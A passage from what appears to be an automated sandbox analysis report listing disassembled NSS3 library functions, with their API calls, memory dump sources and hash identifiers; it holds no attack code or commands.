                                                                                                                                                                                                                            • Part of subcall function 6C4D0BE0: TlsGetValue.KERNEL32(6C4C8D2D,?,00000000,?), ref: 6C4D0C15
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000), ref: 6C4BEEE1
                                                                                                                                                                                                                            • Part of subcall function 6C4B1D50: TlsGetValue.KERNEL32(00000000,-00000018), ref: 6C4B1D7E
                                                                                                                                                                                                                            • Part of subcall function 6C4B1D50: EnterCriticalSection.KERNEL32(?), ref: 6C4B1D8E
                                                                                                                                                                                                                            • Part of subcall function 6C4B1D50: PR_Unlock.NSS3(?), ref: 6C4B1DD3
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4BEE51
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4BEE65
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4BEEA2
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4BEEBB
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4BEED0
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4BEF48
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4BEF68
                                                                                                                                                                                                                          • PR_SetError.NSS3(00000000,00000000), ref: 6C4BEF7D
                                                                                                                                                                                                                          • PK11_DoesMechanism.NSS3(?,?), ref: 6C4BEFA4
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4BEFDA
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE040,00000000), ref: 6C4BF055
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C4BF060
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Errorfree$UnlockValue$CriticalEnterSection$Alloc_DoesK11_MechanismUtilmalloc
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2524771861-0
                                                                                                                                                                                                                          • Opcode ID: 997a928982f1f44679500ffe551d8e3bc81fcae07ab47b0342ffdef141ff92a4
                                                                                                                                                                                                                          • Instruction ID: 11f6e83c7b709ec8ef11116217ce059535c92d5c2547ef586ae2bb3a393a3a0c
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 997a928982f1f44679500ffe551d8e3bc81fcae07ab47b0342ffdef141ff92a4
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 1A815D75A00209ABEB00DFA5DC85EDE7BB5BF48319F154068F909A7B11E731E9248BE1
                                                                                                                                                                                                                          Function 6C484CF0 Relevance: 21.2, APIs: 14, Instructions: 237memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PK11_SignatureLen.NSS3(?), ref: 6C484D80
                                                                                                                                                                                                                          • PORT_Alloc_Util.NSS3(00000000), ref: 6C484D95
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C484DF2
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE005,00000000), ref: 6C484E2C
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE028,00000000), ref: 6C484E43
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C484E58
                                                                                                                                                                                                                          • SGN_CreateDigestInfo_Util.NSS3(00000001,?,?), ref: 6C484E85
                                                                                                                                                                                                                          • DER_Encode_Util.NSS3(?,?,6C5D05A4,00000000), ref: 6C484EA7
                                                                                                                                                                                                                          • PK11_SignWithMechanism.NSS3(?,-00000001,00000000,?,?), ref: 6C484F17
                                                                                                                                                                                                                          • DSAU_EncodeDerSigWithLen.NSS3(?,?,?), ref: 6C484F45
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484F62
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C484F7A
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(00000000,00000000), ref: 6C484F89
                                                                                                                                                                                                                          • SECITEM_ZfreeItem_Util.NSS3(?,00000000), ref: 6C484FC8
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Arena_$ErrorFreeItem_K11_WithZfree$Alloc_CreateDigestEncodeEncode_Info_MechanismSignSignature
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 2843999940-0
                                                                                                                                                                                                                          • Opcode ID: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                          • Instruction ID: 5c63956e96acee10e56fcd7e79b5c755962903df295741b02458712373cb5646
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: d0429b69ca66dd52f004e62b6e1623ef08d55cc0dad0dd1da7617af487e0a603
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 0881AF71A0A301AFE701CF28D850F5AB7E8AB84398F15952DFA58DB740E731E905CB92
                                                                                                                                                                                                                          Function 6C4C5C10 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 221COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?), ref: 6C4C5C9B
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE043,00000000,?,?,?,?,?), ref: 6C4C5CF4
                                                                                                                                                                                                                          • SECMOD_DestroyModule.NSS3(00000000,?,?,?,?,?,?,?), ref: 6C4C5CFD
                                                                                                                                                                                                                          • PR_smprintf.NSS3(tokens=[0x%x=<%s>],00000004,00000000,?,?,?,?,?,?), ref: 6C4C5D42
                                                                                                                                                                                                                          • free.MOZGLUE(00000000,?,?,?,?,?,?,?,?,?), ref: 6C4C5D4E
                                                                                                                                                                                                                          • free.MOZGLUE(?,?,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5D78
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE013,00000000,?,?,?,?,?,?,?,?,?,?), ref: 6C4C5E18
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C5E5E
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C5E72
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C5E8B
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(6A1B7500,2404110F,?,?), ref: 6C4BF854
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(FFD3F9E8,2404110F,?,?), ref: 6C4BF868
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(04C4841B,2404110F,?,?), ref: 6C4BF882
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(04C483FF,?,?), ref: 6C4BF889
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(CCCCCCDF,2404110F,?,?), ref: 6C4BF8A4
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(CCCCCCC3,?,?), ref: 6C4BF8AB
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: DeleteCriticalSection.KERNEL32(280F1108,2404110F,?,?), ref: 6C4BF8C9
                                                                                                                                                                                                                            • Part of subcall function 6C4BF820: free.MOZGLUE(280F10EC,?,?), ref: 6C4BF8D0
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: free$CriticalSection$Delete$DestroyErrorModule$EnterR_smprintfUnlockValue
                                                                                                                                                                                                                          • String ID: d$tokens=[0x%x=<%s>]
                                                                                                                                                                                                                          • API String ID: 2028831712-1373489631
                                                                                                                                                                                                                          • Opcode ID: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                          • Instruction ID: d2121954b11c308731a2fa8168b6f5a17192e2d75b69afc2ea580ef96a01b812
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 588bc3f440a294ba95ef7d308cd4abfb00defd64815552fb2eafc76f830cdf9c
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 3771B4B8B052019BEB01DF25EC45F6E3275AF4531DF144039E8099AB62EB32E915D7E3
                                                                                                                                                                                                                          Function 6C4B8F40 Relevance: 21.2, APIs: 14, Instructions: 179memoryCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(6C4B9582), ref: 6C4B8F5B
                                                                                                                                                                                                                            • Part of subcall function 6C4CBE30: SECOID_FindOID_Util.NSS3(6C48311B,00000000,?,6C48311B,?), ref: 6C4CBE44
                                                                                                                                                                                                                          • PORT_NewArena_Util.NSS3(00000800), ref: 6C4B8F6A
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: calloc.MOZGLUE(00000001,00000024,00000000,?,?,6C4787ED,00000800,6C46EF74,00000000), ref: 6C4D1000
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PR_NewLock.NSS3(?,00000800,6C46EF74,00000000), ref: 6C4D1016
                                                                                                                                                                                                                            • Part of subcall function 6C4D0FF0: PL_InitArenaPool.NSS3(00000000,security,6C4787ED,00000008,?,00000800,6C46EF74,00000000), ref: 6C4D102B
                                                                                                                                                                                                                          • SECOID_FindOIDByTag_Util.NSS3(00000000), ref: 6C4B8FC3
                                                                                                                                                                                                                          • PK11_GetIVLength.NSS3(-00000001), ref: 6C4B8FE0
                                                                                                                                                                                                                          • SEC_ASN1DecodeItem_Util.NSS3(?,?,6C59D820,6C4B9576), ref: 6C4B8FF9
                                                                                                                                                                                                                          • DER_GetInteger_Util.NSS3(?), ref: 6C4B901D
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B903E
                                                                                                                                                                                                                          • SECOID_GetAlgorithmTag_Util.NSS3(?), ref: 6C4B9062
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000024,?,?), ref: 6C4B90A2
                                                                                                                                                                                                                          • PORT_ZAlloc_Util.NSS3(?), ref: 6C4B90CA
                                                                                                                                                                                                                          • memcpy.VCRUNTIME140(00000018,?,?), ref: 6C4B90F0
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE006,00000000), ref: 6C4B912D
                                                                                                                                                                                                                          • free.MOZGLUE(00000000), ref: 6C4B9136
                                                                                                                                                                                                                          • PORT_FreeArena_Util.NSS3(?,00000001), ref: 6C4B9145
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: Util$Tag_$AlgorithmAlloc_Arena_Findmemcpy$ArenaDecodeErrorFreeInitInteger_Item_K11_LengthLockPoolcallocfree
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 3626836424-0
                                                                                                                                                                                                                          • Opcode ID: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                          • Instruction ID: d36f2f11bbee2b8d92e01056e296a2a99b088d866e251e541716e2e63982138d
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 3f6ce0cfddb13e447ecb2fb3232799d84fca09c6c8a975579e41fb96c0001692
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6A51D4B1A042409BEB00DF28DC81F9A77F8AFA4318F054529E859E7741E776E945CBE2
                                                                                                                                                                                                                          Function 6C46AF30 Relevance: 21.1, APIs: 10, Strings: 2, Instructions: 93COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_EnterMonitor.NSS3 ref: 6C46AF47
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390AB
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C5390C9
                                                                                                                                                                                                                            • Part of subcall function 6C539090: EnterCriticalSection.KERNEL32 ref: 6C5390E5
                                                                                                                                                                                                                            • Part of subcall function 6C539090: TlsGetValue.KERNEL32 ref: 6C539116
                                                                                                                                                                                                                            • Part of subcall function 6C539090: LeaveCriticalSection.KERNEL32 ref: 6C53913F
                                                                                                                                                                                                                          • FreeLibrary.KERNEL32(?), ref: 6C46AF6D
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C46AFA4
                                                                                                                                                                                                                          • free.MOZGLUE(?), ref: 6C46AFAA
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C46AFB5
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(%s decr => %d,?,?), ref: 6C46AFF5
                                                                                                                                                                                                                          • PR_ExitMonitor.NSS3 ref: 6C46B005
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B014
                                                                                                                                                                                                                          • PR_LogPrint.NSS3(Unloaded library %s,?), ref: 6C46B028
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE89D,00000000), ref: 6C46B03C
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: MonitorValue$CriticalEnterErrorExitPrintSectionfree$FreeLeaveLibrary
                                                                                                                                                                                                                          • String ID: %s decr => %d$Unloaded library %s
                                                                                                                                                                                                                          • API String ID: 4015679603-2877805755
                                                                                                                                                                                                                          • Opcode ID: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
                                                                                                                                                                                                                          • Instruction ID: b7cf09218529176aab2947cdd7d486e66ffc8663187d5986027ced8389707b8b
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 41c737bc3c018ab29d7348c0c21b6205c1a0d1a347188bc064dd3c8a9b0fb098
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 6531F1B4B04921ABEB00EE62DC40F1AB7B4EF45319B194125E80987F04F722F825CBE6
                                                                                                                                                                                                                          Function 6C4B6C30 Relevance: 21.1, APIs: 6, Strings: 6, Instructions: 58stringCOMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm:,00000004,6C4B781D,00000000,6C4ABE2C,?,6C4B6B1D,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C40
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,sql:,00000004,?,?,?,?,?,?,?,00000000,00000000,6C4B781D,?,6C4ABE2C,?), ref: 6C4B6C58
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,rdb:,00000004,?,?,?,?,?,?,?,?,?,?,00000000,00000000,6C4B781D), ref: 6C4B6C6F
                                                                                                                                                                                                                          • strncmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,extern:,00000007), ref: 6C4B6C84
                                                                                                                                                                                                                          • PR_GetEnvSecure.NSS3(NSS_DEFAULT_DB_TYPE), ref: 6C4B6C96
                                                                                                                                                                                                                            • Part of subcall function 6C461240: TlsGetValue.KERNEL32(00000040,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461267
                                                                                                                                                                                                                            • Part of subcall function 6C461240: EnterCriticalSection.KERNEL32(?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C46127C
                                                                                                                                                                                                                            • Part of subcall function 6C461240: getenv.API-MS-WIN-CRT-ENVIRONMENT-L1-1-0(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C461291
                                                                                                                                                                                                                            • Part of subcall function 6C461240: PR_Unlock.NSS3(?,?,?,?,6C46116C,NSPR_LOG_MODULES), ref: 6C4612A0
                                                                                                                                                                                                                          • strcmp.API-MS-WIN-CRT-STRING-L1-1-0(00000000,dbm), ref: 6C4B6CAA
                                                                                                                                                                                                                          Strings
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: strncmp$CriticalEnterSectionSecureUnlockValuegetenvstrcmp
                                                                                                                                                                                                                          • String ID: NSS_DEFAULT_DB_TYPE$dbm$dbm:$extern:$rdb:$sql:
                                                                                                                                                                                                                          • API String ID: 4221828374-3736768024
                                                                                                                                                                                                                          • Opcode ID: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
                                                                                                                                                                                                                          • Instruction ID: 897c31a8b1060092653288bfd06bfe4c0126d4ca17aff29620e7d388ce14d90e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: 102fd910099e1c4046e730a634a77e5a78da98a3fbcca0a0a78191e7ebcfbd47
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: F501A7B170371537EA10277A5D69F66366C9F42199F180435FE04F0A41EBF2F61940BD
                                                                                                                                                                                                                          Function 6C4C5800 Relevance: 19.7, APIs: 13, Instructions: 227COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C5857
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C586B
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C5888
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C58B9
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C58CD
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C58E9
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,00000000,?,6C4C5915,?), ref: 6C4C5556
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,00000000,?,6C4C5915,?), ref: 6C4C556F
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: PR_Unlock.NSS3(?,?,?,?,?), ref: 6C4C559C
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: SECMOD_UpdateSlotList.NSS3(?,?,?,?,?), ref: 6C4C55A4
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: PR_Sleep.NSS3(?,?,?,?), ref: 6C4C5643
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: TlsGetValue.KERNEL32(?,?,?,?), ref: 6C4C5653
                                                                                                                                                                                                                            • Part of subcall function 6C4C5530: EnterCriticalSection.KERNEL32(?,?,?,?,?), ref: 6C4C5668
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE098,00000000), ref: 6C4C5934
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000), ref: 6C4C59AA
                                                                                                                                                                                                                          • SECMOD_UpdateSlotList.NSS3(?), ref: 6C4C59B3
                                                                                                                                                                                                                          • TlsGetValue.KERNEL32 ref: 6C4C5A4D
                                                                                                                                                                                                                          • EnterCriticalSection.KERNEL32(?), ref: 6C4C5A61
                                                                                                                                                                                                                          • PR_Unlock.NSS3(?), ref: 6C4C5A7A
                                                                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                                                                          • Source File: 00000002.00000002.2298497604.000000006C3F1000.00000020.00000001.01000000.0000000D.sdmp, Offset: 6C3F0000, based on PE: true
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298464366.000000006C3F0000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298679631.000000006C58F000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298738556.000000006C5CE000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298775345.000000006C5CF000.00000008.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298814313.000000006C5D0000.00000004.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          • Associated: 00000002.00000002.2298851866.000000006C5D5000.00000002.00000001.01000000.0000000D.sdmpDownload File
                                                                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                                                                          • Snapshot File: hcaresult_2_2_6c3f0000_DLTDCR8UJINP8YM8Y.jbxd
                                                                                                                                                                                                                          Similarity
                                                                                                                                                                                                                          • API ID: CriticalEnterSectionValue$Unlock$ErrorListSlotUpdate$Sleep
                                                                                                                                                                                                                          • String ID:
                                                                                                                                                                                                                          • API String ID: 1180358131-0
                                                                                                                                                                                                                          • Opcode ID: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
                                                                                                                                                                                                                          • Instruction ID: 6ab9620a04b6650978e7c14f5bbfbbb6dff2b9624a341b4c4c845950ed8b045e
                                                                                                                                                                                                                          • Opcode Fuzzy Hash: a2dc1142d27abcdac47a53ff7df99d47edeed25ce444fd3018390ce5249cf2c3
                                                                                                                                                                                                                          • Instruction Fuzzy Hash: 5F81F0B9F006019BEB00DF29DC81E6E77B5BF45328F140528E84A86B62E731E955CB92
                                                                                                                                                                                                                          Function 6C4C4E60 Relevance: 19.7, APIs: 13, Instructions: 186COMMON
                                                                                                                                                                                                                          Download Yara Rule
                                                                                                                                                                                                                          APIs
                                                                                                                                                                                                                          • PR_SetErrorText.NSS3(00000000,00000000,?,6C4878F8), ref: 6C4C4E6D
                                                                                                                                                                                                                            • Part of subcall function 6C4609E0: TlsGetValue.KERNEL32(00000000,?,?,?,6C4606A2,00000000,?), ref: 6C4609F8
                                                                                                                                                                                                                            • Part of subcall function 6C4609E0: malloc.MOZGLUE(0000001F), ref: 6C460A18
                                                                                                                                                                                                                            • Part of subcall function 6C4609E0: memcpy.VCRUNTIME140(?,?,00000001), ref: 6C460A33
                                                                                                                                                                                                                          • PR_SetError.NSS3(FFFFE09A,00000000,?,?,?,6C4878F8), ref: 6C4C4ED9
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,printPolicyFeedback,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703,?,00000000,00000000), ref: 6C4B5942
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckIdentifier,?,?,?,?,?,?,?,?,?,00000000,?,00000000,?,6C4B7703), ref: 6C4B5954
                                                                                                                                                                                                                            • Part of subcall function 6C4B5920: NSSUTIL_ArgHasFlag.NSS3(flags,policyCheckValue,?,?,?,?,?,?,?,?,?,?,?,?,00000000,?), ref: 6C4B596A
